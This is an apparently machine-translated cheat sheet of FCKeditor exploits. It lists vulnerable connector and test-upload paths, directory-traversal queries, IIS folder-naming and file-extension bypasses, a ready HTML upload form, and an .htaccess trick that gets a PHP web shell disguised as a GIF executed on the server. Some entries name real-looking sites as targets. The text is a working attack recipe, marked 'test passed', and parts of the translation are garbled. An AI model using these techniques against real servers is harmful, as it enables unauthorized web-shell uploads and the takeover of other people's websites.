Summary of FCKeditor exploit exploits
View Editor versions
Fckeditor/_whatsnew.html
Fckeditor/editor/dialog/fck_about.html
Fckeditor/_samples/default.html
A
Editor/filemanager/browser/default/browser.html? Connector=. /.. /connectors/cfm/connector.cfm
Editor/filemanager/connectors/asp/connector.asp
Editor/filemanager/connectors/aspx/connector.aspx
editor/filemanager/connectors/php/connector.php
Editor/filemanager/browser/default/browser.html
Fckeditor/editor/filemanager/connectors/asp/connector.asp? Command=createfolder&type=image¤tfolder=/qing.asp&newfoldername=qing.asp after the/up_files/image/ Directory to create a plain text qing.asp folder.
2.5
A.ASPX.A;. A.aspx.jpg. Jpg
2.4.3
PHP file name plus a question mark, successful upload parsing
/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
Support for PHP kill, 2.6.4 and 2.6.5 test failed
Fckeditor/editor/plugins/bbcode/_sample/sample.html 2.64
—————————————————————————————————————————————————————————————
2. Version 2.2
Apache+linux environment in the upload file after adding a. Break! Test passed.
—————————————————————————————————————————————————————————————
3.Version <=2.4.2 for PHP in the processing of PHP upload does not have the media type of upload file type control, causing users to upload arbitrary files! Save the following as an HTML file and modify the action address.
<form id= "Frmupload" enctype= "Multipart/form-data"
Action= "http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php? Type=media "method=" POST ">upload a new file:<br>
<input type= "File" Name= "NewFile" size= "><br>"
<input id= "Btnupload" type= "Submit" value= "Upload" >
</form>
—————————————————————————————————————————————————————————————
4.FCKeditor file Upload "." How to bypass the "_" Underline
Many times uploaded files such as: Shell.php.rar or shell.php;. JPG will change to shell_php;. JPG This is the change of the new FCK.
4.1: Commit shell.php+ Space Bypass
However the space only supports the win system *nix is not supported [shell.php and shell.php+ spaces are 2 different files not tested.
4.2: Continue uploading the same name file can be changed to shell.php; (1). jpg can also create a new folder, only the first level of the directory is detected, if you skip to level two directory is unrestricted.
—————————————————————————————————————————————————————————————
5. Create a breakthrough folder
Fckeditor/editor/filemanager/connectors/asp/connector.asp? command=createfolder&type=image¤tfolder=%2fshell.asp&newfoldername=z&uuid=1244789975684
Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? Command=createfolder¤tfolder=/&type=image&newfoldername=shell.asp
—————————————————————————————————————————————————————————————
6. Upload address of test file in FCKeditor
Fckeditor/editor/filemanager/browser/default/connectors/test.html
Fckeditor/editor/filemanager/upload/test.html
Fckeditor/editor/filemanager/connectors/test.html
Fckeditor/editor/filemanager/connectors/uploadtest.html
Fckeditor/editor/filemanager/browser/default/frmupload.html
—————————————————————————————————————————————————————————————
7. Common Upload Address
Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? command=getfoldersandfiles&type=image¤tfolder=/
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/asp/ Connector.asp
Fckeditor/editor/filemanager/browser/default/browser.html? type=image&connector=http://inc.jxbsu.com/fckeditor%2feditor%2ffilemanager%2fconnectors%2fphp% 2fconnector.php (ver:2.6.3 test pass)
JSP version:
Fckeditor/editor/filemanager/browser/default/browser.html? type=image&connector=connectors/jsp/connector.jsp
Note that the Red section is modified to fckeditor the actual scripting language used, and the blue section can be customized
The folder name can also be used. /.. Directory traversal, the purple part is the actual website address.
—————————————————————————————————————————————————————————————
8. Other Upload Address
Fckeditor/_samples/default.html
Fckeditor/_samples/asp/sample01.asp
Fckeditor/_samples/asp/sample02.asp
Fckeditor/_samples/asp/sample03.asp
Fckeditor/_samples/asp/sample04.asp
Generally many sites have been deleted _samples directory, you can try.
Fckeditor/editor/fckeditor.html can not upload files, you can click the Upload image button and then select Browse Server to jump to the upload file page.
—————————————————————————————————————————————————————————————
9. Listing vulnerabilities can also help to find the upload address
Version 2.4.1 Test Passed
Modify the CurrentFolder parameter using: /.. /To enter a different directory
/browser/default/connectors/aspx/connector.aspx? Command=createfolder&type=image¤tfolder=. /.. /.. %2f&newfoldername=shell.asp
Depending on the XML information returned, you can view all the directories in the site.
Fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx? command=getfoldersandfiles&type=image¤tfolder=%2f
You can also browse the drive letter directly:
JSP version:
Fckeditor/editor/filemanager/browser/default/connectors/jsp/connector? command=getfoldersandfiles&type=¤tfolder=%2f
—————————————————————————————————————————————————————————————
10. Explode Path Vulnerability
Fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx? Command=getfoldersandfiles&type=file¤tfolder=/shell.asp
—————————————————————————————————————————————————————————————
One. FCKeditor of the filtering problem caused by passive restriction strategy
Impact version: FCKeditor x.x <= FCKeditor v2.4.3
Vulnerability Description:
The file category in FCKeditor v2.4.3 rejects the upload type by default:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi| Htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 allows uploading of the ASA, CER, PHP2, PhP4, Inc, PWML, PHT suffix file after uploading it to save files directly with $sfilepath = $sServerDir. $sFileName, instead of using $sextension as the suffix. Direct result in Win under the upload file after adding a. To break through [not tested]!
In Apache, because "Apache file name resolution flaw vulnerability" can also be exploited, and other upload vulnerabilities are recommended to define the type variable when using the file category to upload files, according to the FCKeditor code, the limit is the most narrow.
It is good to have a script file uploaded at the time of uploading, but some versions may not be able to upload directly can be used after the file name plus. dot or space bypass, you can also use 2003 parsing vulnerability to establish xxx.asp folder or upload xx.asp; Jpg!
—————————————————————————————————————————————————————————————
12. The oldest loophole, the type file has no limitations!
I was exposed to the first fckeditor loophole. The version is unknown, it should be very old, because the program does not check the type of type=xxx. We can directly construct the upload to change the type=image to Type=hsren so you can create a folder called Hsren, a new type, without any restrictions, you can upload any script!
—————————————————————————————————————————————————————————————
=============================================================================================================== ================================
FCK Editor JSP version vulnerability:
<2.43
Http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector? command=fileupload&type=image¤tfolder=%2f
Upload your horse's catalogue
Editor/filemanager/browser/default/connectors/jsp/connector? Command=getfoldersandfiles&type=. /.. /¤tfolder=/
Fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?
command=getfoldersandfiles&type=image¤tfolder=/
Upload the address of the shell:
Http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html? Type=image&connector=connectors/jsp/connector
It has to do with the version. Not hundred percent success. Test several stations successfully.
I can't kill him.
Http://www.****.com/fckeditor/editor/filemanager/browser/default/browser.html?type=file&connector= Connectors/jsp/connector
If the above address is not possible, try it.
Fckeditor/editor/filemanager/browser/default/browser.html? Type=image&connector=/servlet/connector
fckeditor/_samples/
Fckeditor/_samples/default.html
Fckeditor/editor/fckeditor.htm
Fckeditor/editor/fckdialog.html
Fckeditor/editor/filemanager/connectors/uploadtest.html
/fckeditor/editor/filemanager/browser/default/browser.html? Type=image&connector=http%3a%2f%2fwww.banggood.com%2fadmin%2ffckeditor%2feditor%2ffilemanager%2fconnectors %2fphp%2fconnector.php
In the Name of GOD
[+] Title:fckeditor all Versian arbitrary File Upload Vulnerability
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author:pentesters.ir
[+] Website:PenTesters.IR
---------------------------------------------------------
1. Create a htaccess file:
Code
<filesmatch "_php.gif" >
SetHandler application/x-httpd-php
</FilesMatch>
2. Upload the htaccess via FC
Http://www.xxxx.com/FCKeditor/editor/filemanager/upload/test.html
Http://www.xxxx.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
----------------------------------------------------------------------------------------------
3.Now upload shell.php.gif with FCKeditor.
4.After upload Shell.php.gif, the name "Shell.php.gif" to "shell_php.gif" automatically.
5.http://www.2cto.com/anything/shell_php.gif
6.Now shell is available from server.
---------------------------------------------------------
All understand, use htaccess make Apache will _php.gif parse ...
Http://www.banggood.com/admin/fckeditor/_samples/default.html
Summary of FCKeditor exploit exploits